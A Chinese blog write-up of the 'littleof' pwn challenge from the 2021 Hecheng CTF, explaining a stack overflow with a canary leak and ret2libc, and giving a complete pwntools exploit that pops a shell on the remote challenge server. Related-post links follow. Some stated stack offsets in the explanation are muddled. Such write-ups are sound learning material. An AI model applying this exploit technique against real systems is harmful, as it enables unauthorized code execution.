NSSCTF [2021 鹤城杯]littleof

已于 2023-03-03 00:16:56 修改
阅读量654 收藏 4
点赞数 2
分类专栏: Pwn 文章标签: python linux 网络安全 学习 网络 Powered by 金山文档
于 2023-03-02 23:43:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/129310331
版权

Checksec & IDA

开启了Canary和NX,再来看看IDA中是怎样的。

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  sub_4006E2();
  return 0LL;
}
unsigned __int64 sub_4006E2()
{
  char buf[8]; // [rsp+10h] [rbp-50h] BYREF
  FILE *v2; // [rsp+18h] [rbp-48h]
  unsigned __int64 v3; // [rsp+58h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  v2 = stdin;
  puts("Do you know how to do buffer overflow?");
  read(0, buf, 0x100uLL);
  printf("%s. Try harder!", buf);
  read(0, buf, 0x100uLL);
  puts("I hope you win");
  return __readfsqword(0x28u) ^ v3;
}

很显然栈溢出漏洞位于read函数中,buf大小为0x50,而read函数的第三参数,也就是输出/写入/输出的最大的字节长度为0x100,就是2个buf大小的数据。

但是本题开启了Canary,因此我们不能直接进行栈溢出以及Ret2Libc攻击。

我们可以发现,我们输入的Payload会被第二段的printf打印出来。也就是说可以利用这个printf打印出来Canary,将Canary原封不动的归位,即可跳过检测。

printf("%s. Try harder!", buf);

Canary是位于EBP之前的一串随机数据,用来防止栈上的内容溢出进行某些危险攻击的。因此如果我们需要泄露Canary,我们可以这么构造Padding:

Padding = b'A' * ( 0x50 - 0x08 )

为什么是0x50 - 0x08?

我们都知道Canary 会在栈上添加一个随机值,以保护程序免受缓冲区溢出攻击,但是也会在栈上多占用一些空间。

也就是说:

假如我的 buf 大小为 0x50

如果是 64 位程序,那么 Canary 就会在栈上额外占用 0x08 的空间作为随机值。

也就是说 我的可用空间只有 0x42 。

开启 Canary : RBP 位于 0x50 + 0x08,Canary位于0x50 - 0x08,Return Address位于0x50 + 0x16

而 0x50 + 0x08 在不开启 Canary 的情况下是 Return Address 的地址

关闭 Canary : RBP 位于 0x50,Return Address位于0x50 + 0x08

这时候的 0x50 + 0x08 是 Return Address 的地址。

因此泄露Canary的Payload如下:

Padding = b'A' * ( 0x50 - 0x08 )

io.recvuntil(b'overflow?')
Payload_Canary = Padding
io.sendline(Payload_Canary)
io.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n')
Canary = u64(io.recv(7).rjust(8, b'\x00'))
log.success("Canary: " + (hex(Canary)))

这里有72个A,代表了Padding。暂时还没搞懂为什么直接填Padding会报错无效。

\n 是换行符,因为我们使用的是sendline,会自动在结尾加上换行符。

为什么Canary是接收7个字节:

Paload发送了0x49个字节,总共0x50个字节,程序会把Canary放在变量起始位置,所以只需要接收7个,然后用一个0填充即可。

具体思路如下:

因为Canary是栈中的一个随机值,我们通过printf泄露Canary,然后将其填充至它本来应该在的位置,就能通过检查。

也就是泄露真实地址和getshell的Payload也得这样构造:

Payload_Leak = Padding + p64(Canary) + Padding_Ret + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)

Payload_Shell = Padding + p64(Canary) + Padding_Ret + p64(ret) + p64(rdi) + p64(binsh) + p64(system)

Padding就是上文泄露Canary的Payload

Canary就是Canary的数据

Padding_Ret 代表覆盖原先栈上的 RBP

Ret 用来平衡栈帧

Rdi 用来存放 system 的第一个函数,也就是 /bin/sh 字符串的地址的。

接下来就是常规的Ret2Libc的解法,不多赘述。

EXP:

from pwn import *
from LibcSearcher import *

#io = process("/home/Kaguya/桌面/Pwn/littleof")
io = remote("1.14.71.254",28499)
elf = ELF("/home/Kaguya/桌面/Pwn/littleof")
context(log_level = 'debug',arch = 'amd64',os = 'linux')

rdi = 0x400863
ret = 0x40059E
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x400789

Padding = b'A' * ( 0x50 - 0x08 )
Padding_Ret = b'A' * 0x08

io.recvuntil(b'overflow?')
Payload_Canary = Padding
io.sendline(Payload_Canary)
io.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n')
Canary = u64(io.recv(7).rjust(8, b'\x00'))
log.success("Canary: " + (hex(Canary)))


Payload_Leak = Padding + p64(Canary) + Padding_Ret + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendlineafter(b'Try harder!',Payload_Leak)
addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
log.success("Real Address: " + (hex(addr)))

# Local
#ibc = LibcSearcher('puts',addr)
#base = addr - libc.dump('puts')
#system = base + libc.dump('system')
#binsh = base + libc.dump('str_bin_sh')

# Remote
base = addr - 0x080aa0
system = base + 0x04f550
binsh = base + 0x1b3e1a

io.recvuntil(b'overflow?')
Payload_Canary = Padding
io.sendline(Payload_Canary)
io.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n')
Canary = u64(io.recv(7).rjust(8, b'\x00'))
log.success("Canary: " + (hex(Canary)))

Payload_Shell = Padding + p64(Canary) + Padding_Ret + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
io.sendlineafter(b'Try harder!',Payload_Shell)
io.interactive()

平台的libc和本地算出来是不一样的,平台的libc是libc6_2.27-3ubuntu1.4_amd64

本地是 libc6_2.31-0ubuntu9.9_amd64

每个人环境不同,但是本地的偏移是打不通平台的,需要去libc database search网站查找libc6_2.27-3ubuntu1.4_amd64的偏移地址

Red-Leaves
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
NSSCTF-鹤城2021-wp
F1rstb100d
09-22 713
NSSCTF-鹤城2021-wp
2021鹤城pwn部分wp
eeeeeight的博客
10-09 2070
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
【PWN · ret2libc | Canary】[2021 鹤城]littleof
Mr_Fmnwon的博客
06-08 851
Canary作为经典且基本的栈保护措施,在后期的题目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。不断总结,不断求学。
反思:泄露canary之后一定要记得处理掉多余的东西————[2021 鹤城]littleof
m0_73858054的博客
02-28 785
这是一道libc类型的题目,应该是不难的,月余之前遇到。当时思路什么的都理清楚了,脚本也写出来了,结果死活获取不到shell…最后又重写了一遍才跑成功了。今天又想起来这件事儿,重新捋了一遍。终于是让我找到了原因!现在把这个原因记录下来,惊醒自己千万要注重细节,不要再犯这种错误。
[2021 鹤城]littleof [泄露canary,libc] 总结
最新发布
qq_48466156的博客
06-15 241
[2021 鹤城]littleof [泄露canary,libc] 总结
首届"鹤城"CTF网络安全挑战赛 - 初赛writeup
渗透测试研究中心
12-22 1833
WEB1.middle_magic%0a绕过第一关最后加%23是#数组绕过第二关json 弱类型比较http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2...
littleof ——攻防世界
qq_41696518的博客
08-30 1714
littleof ——攻防世界
鹤城Re题目
寻梦&之璐
10-23 350
文章目录AreYouRich分析登录验证token简单异或脚本 AreYouRich 分析 登录 拿到这个题的时候,新手往往会把这里当成重点: 比如说我。。。。老狗了。。。其实搞出用户名和密码啥用都没有。。当时一直就围绕前面这个来思考。结果想断篇了。这个类主要用处就是传递token,其它的啥用没有 把这里找好 验证token 而验证token的话,最主要是两个while循环(其中有个还是赋值操作。笑哭) while(v9 < v6) { v11 = (v5[v10]
鹤城新区
02-11
合成大西瓜 声明,本项目仅帮助大家学习技术及娱乐,切勿将修改后的网站大规模传播及商业化,精确识别! 最简单的魔改发布『合成大西瓜』,配套改图工具,不用改代码,修改配置即可! 有帮助的话,求个大大的star,...
2021年黑龙江齐齐哈尔市数字鹤城产业研究院招考聘用强化练习卷.doc
09-02
2021年黑龙江齐齐哈尔市数字鹤城产业研究院招考聘用强化练习卷.doc
鹤城二手信息港网站
03-29
为达到最佳效果,推荐使用九网互联的ASP空间,支持绑定域名到目录。可在线发布信息,管理信息,管理访客留言,商户用户管理,个人用户管理等。...我的QQ10497015另外本人还在发展 51数码中国,希望得到您的支持!...
黑龙江鹤城酒业有限公251.doc
09-10
【黑龙江鹤城酒业有限公司2007年大庆市场营销计划书】 黑龙江鹤城酒业有限公司针对2007年度大庆市场的营销计划,旨在分析并利用当地市场特点,抓住商机,提升品牌影响力。根据描述,大庆白酒市场是黑龙江省最具潜力...
2021-2022年收藏)在鹤城区背街小巷路灯亮化工程启动仪式上的讲话.doc
10-06
教育资料
2021CTF鹤城-Re
PMR的博客
10-13 829
1、Petition 总的来说还是比较喜欢这类题目的,因为它的flag是一位一位校验的,能爆破当然是一件很爽的事情。 回到正文:IDA载入文件: 程序从start开始执行,说是说"%36s"
pwn题中 setbuf的用处
Maxmalloc的博客
10-14 2793
在我们遇到的每一个需要输入输出的pwn题中一般都会有下面这几条语句 setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stderr, 0LL, 2, 0LL); 直到今天才彻底搞明白这三句话的作用。 因为我们搭建pwn题一般都是用socat进行端口转发,pwn题搭建详情 但是socat不是一次写一行而...
一道简单的访问越界、栈溢出pwn解题记录
qq_39153421的博客
03-16 701
检查题目 checksec保护都没开,降低了难度。64位程序,ida查看代码: ManageBook *v3; // rbx char buf[24]; // [rsp+0h] [rbp-30h] BYREF ManageBook *v6; // [rsp+18h] [rbp-18h] setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 1, 0LL); puts("your name:"); read(0, buf, 0x100u
首届“鹤城”河南·鹤壁CTF网络安全挑战赛部分WP
七堇年的博客
12-24 2541
首届“鹤城”河南·鹤壁CTF网络安全挑战赛WP
鹤城PWN几道题的writeup
10-09 564
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
2021CTF鹤城挑战赛题目附件
NNanfeng
10-08 840
除了web题 所有的题目文件都在这里 链接:https://pan.baidu.com/s/1XXFSdNnlMdmlJtCMnl5dSg 提取码:nx87 –来自百度网盘超级会员V1的分享 需要的师傅请自行提取哦
知乎小白关于ctf竞赛训练 积累的资料
热门推荐
syh_486_007的专栏
09-04 3万+
一个巧合的机会,成为了CTF夺旗爱好者,一个ctf小白。从12年开始国内大大小小的CTF比赛我都看过,那会还没有统一叫CTF,都是叫 网络攻防赛、信息安全赛之类的,目的就是为了通过技术手段找到最终的key(现在的CTF中叫做flag)。只是到了后来慢慢的可能受到DEFCON CTF的影响国内所有的安全竞赛也统一叫做CTF竞赛了。 国内外比较知名的比赛:XCTF联赛、DEFCON CTF、首都网络

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值